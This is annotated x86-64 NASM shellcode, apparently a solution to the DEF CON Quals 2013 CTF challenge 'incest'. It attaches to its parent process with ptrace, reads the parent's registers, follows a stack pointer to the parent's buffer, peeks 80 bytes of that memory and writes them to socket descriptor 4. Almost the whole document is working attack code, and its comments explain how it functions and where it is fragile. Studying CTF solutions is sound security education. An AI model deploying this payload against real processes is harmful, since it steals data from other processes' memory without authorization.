- ;
- ; Defcon Quals 2013 - incest
- ;
- ; ptrace parent shellcode for sis
- ; by timhsu@chroot.org, June 2013
- ; NASM (Intel) syntax, x86-64 Linux. Raw `syscall` convention throughout:
- ;   nr in rax; args in rdi, rsi, rdx, r10, r8, r9; result in rax (negative = -errno);
- ;   rcx and r11 are clobbered by the instruction.
- BITS 64
- GLOBAL _start
- ; _start: entry point of the payload.
- ; Stack layout once `run` is reached (set up by the call/pop trick in get_buf):
- ;   [rsp]   = "ptr"    : address handed to ptrace as its data/output pointer (r10)
- ;   [rsp+8] = "buffer" : same address, kept for the final write
- ; Register roles: rbx = parent pid, r10 = output cursor into `buffer`,
- ;   rdx = address inside the parent being read, rcx = loop counter.
- ; No syscall result is ever checked (the try_* labels are plain fall-through).
- ; Most immediates are built with xor/add rather than mov imm, presumably to keep
- ; zero bytes out of the encoding; `mov rdi, 12` / `mov rcx, 10` / `mov rax, 101`
- ; below do not follow that pattern, so the encoding is not actually zero-free.
- _start:
- jmp get_buf ; forward jump; get_buf does `call run`, which pushes the address of `buffer`
- run:
- pop rsi ; rsi = address of `buffer` (the return address pushed by `call run`)
- push rsi ; save buffer address ([rsp+8] after the next push)
- push rsi ; ptr = buffer (stays on top of the stack; re-read into r10 at try_getregs)
- xor rax, rax ; zero the registers
- xor rdi, rdi
- xor rdx, rdx
- xor rbx, rbx
- ; sys_getppid()
- add rax, 110 ; __NR_getppid = 110
- syscall
- mov rsi, rax ; rsi = ppid (pid argument for the ptrace calls below)
- push rsi
- pop rbx ; rbx = ppid, callee-saved so it survives the `call ptrace_peektext` below
- try_attach:
- ; sys_ptrace(request, pid, addr, data);
- ; rdi , rsi, rdx, r10
- ; r10 (data) is left with whatever it held; PTRACE_ATTACH ignores addr and data.
- xor rax, rax
- add rax, 101 ; __NR_ptrace = 101
- xor rdx, rdx
- ; PTRACE_ATTACH 16
- xor rdi, rdi
- add rdi, 16
- syscall
- ; rax (0 or -errno) is not inspected. If the attach is refused (e.g. by a Yama
- ; ptrace_scope policy, since the parent is not a descendant of this process),
- ; everything below still runs and the final write dumps stale buffer contents.
- ; wait4(pid, status, opt, rusage)
- ; rdi rsi rdx, r10
- try_wait:
- xor rax, rax
- ; NR_wait4 = 61
- add rax, 61
- mov rdi, rbx ; pid = ppid
- xor rsi, rsi ; status = NULL
- xor rdx, rdx ; options = 0
- xor r10, r10 ; rusage = NULL
- syscall ; blocks until the parent enters the ptrace-stop caused by the attach
- try_getregs:
- mov rsi, rbx ; pid = ppid
- xor rax, rax
- add rax, 101 ; __NR_ptrace
- xor rdx, rdx ; addr = 0 (unused by GETREGS)
- ;
- ; PTRACE_GETREGS (rdi, rsi, rdx, r10);
- mov rdi, 12 ; PTRACE_GETREGS = 12
- pop r10
- push r10 ; r10 = [rsp] = ptr = address of `buffer`, stack left unchanged
- syscall ; kernel writes struct user_regs_struct to *r10; that struct is far larger
- ; than the 10-byte `buffer`, so this relies on the memory after `buffer` being
- ; writable scratch that nothing else needs.
- mov rdx, [r10+4*8] ; user_regs_struct field 4 is rbp (order: r15, r14, r13, r12, rbp, ...)
- try_peektext:
- sub rdx, 0x18 ; from disasm sis, rbp-0x18 is the parent's stack slot holding
- ; get buffer address of parent (a pointer to the parent's buffer)
- do_peektext:
- mov rsi, rbx ; pid = ppid
- call ptrace_peektext ; reads the qword at parent[rdx]; the raw syscall stores it at *r10
- mov rdx, [r10] ; rdx = address (the pointer value just read = parent's buffer)
- mov rcx, 10 ; read 10 times (10 qwords = 80 bytes)
- again_peektext:
- ; PTRACE_PEEKTEXT again => loop for get more data
- mov rsi, rbx
- call ptrace_peektext ; the callee saves/restores rcx (syscall clobbers it) so `loop` works
- add r10, 8 ; ptr+=8  (output cursor; this second writer also runs past the 10-byte buffer)
- add rdx, 8 ; address+=8 (next qword in the parent)
- loop again_peektext
- dump:
- pop rsi ; ptr (discarded)
- pop rsi ; buffer, to dump (the copy saved first in `run`)
- ; sys_write(stdout, buffer, length)
- xor rax, rax
- xor rdx, rdx
- add rax, 1 ; sys_write
- xor rdi, rdi
- add rdi, 4 ; socket = 4 (fd number assumed by the author; not derived here)
- add rdx, 80 ; string length = 10 qwords peeked above
- syscall
- ; sys_exit
- xor rax, rax
- add rax, 60 ; sys_exit; rdi still holds 4 from the write, so the exit status is 4
- syscall
- ;-----------------------------------------------------------------------
- ; ptrace_peektext: issue one ptrace(PTRACE_PEEKDATA, pid, addr, data) call.
- ; In:    rsi = tracee pid, rdx = address in the tracee, r10 = output pointer
- ; Out:   rax = raw syscall result (0 or -errno); *r10 = the qword read
- ;        (the raw syscall stores the word through `data`, unlike the libc
- ;        wrapper which returns it)
- ; Clobb: rax, rdi, r11, flags. rcx is saved/restored because `syscall`
- ;        clobbers it and the caller uses it as the `loop` counter.
- ; Note:  named "peektext" but request 2 is PTRACE_PEEKDATA; on Linux the two
- ;        requests behave identically.
- ;-----------------------------------------------------------------------
- ptrace_peektext:
- ; ptrace(rdi, rsi, rdx, r10);
- ; PTRACE_PEEKDATA 0x2
- push rcx ; preserve the caller's loop counter across the syscall
- xor rax, rax ; redundant: the mov below overwrites rax
- xor rdi, rdi ; redundant: the mov below overwrites rdi
- mov rax, 101 ; __NR_ptrace
- mov rdi, 2 ; PTRACE_PEEKDATA
- syscall
- pop rcx
- ret
- ; get_buf: call/pop trick. `call run` pushes the address of the instruction that
- ; follows it -- which is `buffer` -- so `run` can pop it without any absolute address.
- get_buf:
- call run ; put address of buffer onto the stack
- ; `buffer` is only 10 bytes, yet _start writes a full user_regs_struct and then
- ; 80 bytes of peeked data starting here; the payload depends on the bytes after
- ; this point being writable and unused.
- buffer:
- db 'AAAAAAAAAA'